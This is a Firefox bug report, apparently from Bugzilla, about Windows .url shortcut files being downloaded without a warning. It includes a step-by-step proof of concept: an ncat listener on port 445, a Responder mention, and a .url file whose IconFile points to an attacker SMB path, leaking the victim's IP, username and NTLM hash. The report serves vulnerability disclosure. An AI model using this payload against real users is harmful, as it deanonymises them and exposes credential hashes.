Closed Bug 1784451 Opened 2 years ago Closed 1 year ago

URL files on windows should be flagged as potentially malicious

Categories

(Toolkit :: Safe Browsing, enhancement)

Product:
Toolkit
Component:
Safe Browsing
Version:
Firefox 103
Type:
enhancement

Tracking

()

Status:
RESOLVED DUPLICATE of bug 1809923

People

(Reporter: bugzilla_mozilla_org, Unassigned)

References

Details

Steps to reproduce:

  1. Open a listener on port 445(smb) anywhere on the internet. A simple ncat -lvp 445 is enough for obtaining a real IP address bypassing browser's proxy settings(impacts tor browser), although responder(https://github.com/lgandx/Responder) can also be used to grab more data about the user including arbitrary environment variables, the real username and the NTLM password hash.

  2. Create a file with an url extension containing the following contents and host it anywhere on the web(replacing x.x.x.x with the ip of the listener created in the previous step).

[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\x.x.x.x\%USERNAME%.icon
IconIndex=1
  1. Download the file created in the previous step.

Actual results:

Firefox downloaded the file. If you were to open the downloads directory in windows file explorer it would send out a ping to the server containing a lot of potentially sensitive data.

Expected results:

Firefox should have flagged the file as potentially malicious and not downloaded it automatically even with browser.download.always_ask_before_handling_new_types set to false.
This is the behavior of the chromium browser(https://bugs.chromium.org/p/chromium/issues/detail?id=335029)

This was fixed in bug 1809923. Sorry we didn't notice this one... "SafeBrowsing" isn't the feature that controls this.

Status: UNCONFIRMED → RESOLVED
Closed: 1 year ago
Duplicate of bug: CVE-2023-25734
Resolution: --- → DUPLICATE
You need to log in before you can comment on or make changes to this bug.